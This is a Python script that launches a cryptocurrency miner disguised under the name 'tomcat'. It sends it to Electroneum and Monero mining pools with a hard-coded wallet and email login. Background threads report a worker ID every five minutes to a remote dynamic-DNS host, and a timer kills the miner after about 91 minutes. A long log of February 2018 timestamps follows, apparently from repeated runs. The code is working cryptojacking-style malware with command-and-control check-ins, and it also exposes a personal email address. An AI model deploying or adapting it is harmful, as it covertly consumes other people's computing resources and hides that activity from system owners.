import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:55:08.129132
#2018-02-17 16:42:04.169785
#2018-02-17 18:29:03.395463
#2018-02-17 20:18:05.966480
#2018-02-17 22:04:03.715303
#2018-02-17 23:48:07.277337
#2018-02-18 01:36:07.327380
#2018-02-18 03:23:03.916579
#2018-02-18 05:11:04.035436
#2018-02-18 07:03:06.125095
#2018-02-18 08:51:04.202820
#2018-02-18 10:38:05.250070
#2018-02-18 12:23:03.623111
#2018-02-18 14:09:06.887521
#2018-02-18 15:59:04.804819
#2018-02-18 17:49:05.846116
#2018-02-18 19:35:02.043006
#2018-02-18 21:20:05.729062
#2018-02-18 23:08:05.155578
#2018-02-19 00:55:06.140841
#2018-02-19 02:42:03.731803
#2018-02-19 04:29:05.810673
#2018-02-19 06:14:04.926446
#2018-02-19 08:02:07.063367
#2018-02-19 09:52:05.338849
#2018-02-19 11:41:01.687609
#2018-02-19 13:27:01.446539
#2018-02-19 15:16:09.178606
#2018-02-19 17:05:03.716274
#2018-02-19 18:50:07.368048
#2018-02-19 20:39:06.573609
#2018-02-19 22:26:07.600530
#2018-02-20 00:12:04.644359
#2018-02-20 01:58:05.940101
#2018-02-20 03:48:01.498474
#2018-02-20 05:32:05.183146
#2018-02-20 07:16:06.723462
#2018-02-20 09:03:08.202019
#2018-02-20 10:47:01.695988
#2018-02-20 12:33:09.307736
#2018-02-20 14:18:07.880487
#2018-02-20 16:01:03.669490
#2018-02-20 17:47:07.729196
#2018-02-20 19:37:02.186700
#2018-02-20 21:23:07.067937
#2018-02-20 23:07:08.080188
#2018-02-21 00:50:08.897113
#2018-02-21 02:37:05.296885
#2018-02-21 04:25:08.369881
#2018-02-21 06:13:04.884815
#2018-02-21 07:59:05.327655
#2018-02-21 09:44:08.332417
#2018-02-21 11:33:01.331834
#2018-02-21 13:21:01.939143
#2018-02-21 15:05:11.702741
#2018-02-21 17:18:07.523974
#2018-02-21 19:06:05.712423
#2018-02-21 20:54:02.161183
#2018-02-21 22:39:07.346943
#2018-02-22 00:29:04.958033
#2018-02-22 02:17:03.676504
#2018-02-22 04:03:05.880381
#2018-02-22 05:49:07.549828
#2018-02-22 07:36:07.638759
#2018-02-22 09:25:01.651660
#2018-02-22 11:11:06.808868
#2018-02-22 12:57:05.821409
#2018-02-22 14:44:03.919594
#2018-02-22 16:29:11.238986
#2018-02-22 18:16:01.990951
#2018-02-22 20:07:09.304257
#2018-02-22 21:56:08.429918
#2018-02-22 23:43:09.881688
#2018-02-23 01:50:05.058830
#2018-02-23 03:37:06.572604
#2018-02-23 05:21:05.939075
#2018-02-23 07:07:07.440442
#2018-02-23 08:56:06.223809
#2018-02-23 11:13:07.171465
#2018-02-23 13:08:01.531849
#2018-02-23 14:52:07.410943
#2018-02-23 16:41:01.627789
#2018-02-23 18:27:07.737434
#2018-02-23 20:12:08.547219
#2018-02-23 22:00:11.829762
#2018-02-23 23:48:02.170604
#2018-02-24 01:34:06.038530
#2018-02-24 03:23:05.588378
#2018-02-24 05:09:06.934093
#2018-02-24 06:57:06.850483
#2018-02-24 08:48:01.512696
#2018-02-24 10:52:04.947367
#2018-02-24 12:39:06.970138
#2018-02-24 14:27:06.039189
#2018-02-24 16:15:04.145451
#2018-02-24 18:09:08.085328
#2018-02-24 19:56:08.024815
#2018-02-24 21:40:01.528867
#2018-02-25 00:32:07.465838
#2018-02-25 03:32:05.174119
#2018-02-25 07:18:01.642624